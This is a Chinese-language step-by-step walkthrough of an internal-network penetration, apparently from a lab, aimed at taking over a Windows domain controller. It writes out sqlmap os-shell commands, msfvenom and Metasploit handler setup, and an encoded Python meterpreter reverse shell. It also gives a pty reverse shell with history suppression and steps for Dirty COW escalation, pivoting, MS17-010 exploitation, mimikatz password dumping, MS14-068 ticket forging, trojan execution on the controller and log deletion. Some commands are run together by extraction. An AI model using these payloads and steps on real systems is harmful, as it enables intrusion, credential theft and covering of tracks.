Bootstrap

内网渗透横向攻击流程

拓扑环境

目的

通过Kali Linux拿到域控权限

Web渗透

目录扫描

使用dirbuster工具扫描网站根目录设置kali默认字典文件

扫描获得phpinfo.php

得到网站绝对路径信息

SQL查询报错

通过测试发现存在sql整型注入报错情况,进一步获取webshell

SQL注入

通过sqlmap测试发现存在sql注入

获取webshell

这里有绝对路径的情况下,可直接写入webshell。这里使用sqlmap os­shell的功能

sqlmap(os­shell)

#通过sqlmap获取命令执行会话sqlmap ‐u "http://IP/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`

直接写webshell(pass)

反弹shell

为了更好做后续操作,进行反弹shell

获取目标系统信息

os‐shell> uname ‐aos‐shell> whereis python`

获取meterpreter会话

由于网站上为linux默认安装python,可直接生成python反弹脚本

#生成python反弹脚本msfvenom ‐p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 ‐f raw#msf监听反向连接会话msfconsoleuse exploit/multi/handlerset payload python/meterpreter/reverse_tcp set LHOST IPset LPORT 4444run#msf监听快速启动cat py_reverse_tcp.rcuse exploit/multi/handlerset payload python/meterpreter/reverse_tcp set LHOST 192.168.0.17set LPORT 4444

exploitmsfconsole ‐r py_reverse_tcp.rc

#在sqlmap os‐shell模式下执行python meterpreter反弹脚本

os‐shell> python ‐c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF‐8')} [sys.version_info[0]] ('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRy eToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm 5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUu c2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKV swXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxl bihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"

nc+python反弹

#kali监听会话

root@kali:~# nc ‐lvvp 6666
#在sqlmap os‐shell模式下执行python bash反弹脚本
os‐shell> python ‐c "import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((' IP',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.filen o(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');s.clos e();"` 

sqlmap执行:

监听端口返回反弹shell结果:

提权

拿到shell后,尝试提升权限

查看当前内核版本

通过uname ­a获取当前系统内核版本

使用已知漏洞提权

根据可已知内核漏洞下载对应的提权程序(该处使用脏牛内核提权)

获得firefart用户,权限为root

切换用户为firefart后,将passwd恢复,避免root用户无法使用

横向渗透

通过查看网卡信息后发现存在内网地址信息

内网代理

meterpreter自动路由(首选)

reGeorg+proxychains

由于web服务器第二张网卡无法上网,需进行内网代理

在web服务器的shell下,下载tunnel.nosocket.php文件,做代理流量

可正常访问tunnel.nosocket.php文件

[

Kali上执行reGeorg代理脚本

修改proxychains配置文件,在末行添加socks信息。

##msf自带代理设置

内网资产扫描

端口扫描

使用msf自带端口扫描模块,探测出10.0.1.9和10.0.1.254都存在445、3389端口。

10.0.1.9 IP端口开放情况

10.0.1.254 IP端口开放情况

MS17­010漏洞主机扫描

通过代理方式,使用msf框架扫描内网网段中存在MS17­010漏洞主机

MS17­010漏洞利用

通过meterpreter路由方式,background之后使用ms17­010攻击模块进行攻击

域渗透

信息收集

查看当前主机信息

获取当前域

使用mimikatz获取密码

加载mimikatz模块

获取域账号SID

域控定位

MS14­068

python脚本生成票据

msf模块生成票据

本地生成kirbi文件

kirbi转为ccache

生成正向连接的msf test.exe木马

生成msf监听端口程序

新建一个msf会话监听正向连接payload

上传利用工具

上传利用工具、ms14­086黄金票据到win7跳板机上

票据导入

在win7跳板机上执行

`#清空票据 klist purge#导入票据

cd c:/users/kevin
mimikatz.exe
kerberos::ptc TGT_liujiafeng@kevin.com.ccache

复制木马到域控

再通过win7跳板机复制test.exe到域控c盘,并通过at命令添加定时任务执行test.exe

`copy test.exe \dc1.kevin.com\c$ dir \dc1.kevin.com\c

在域控上添加at定时任务执行木马

查看当前域控at定时任务

在域控at定时任务执行后,连接域控4444端口

所有获得的meterpreter会话

清除痕迹

结束msf木马进程,删除exe进程

删除win7工具

windows删除系统日志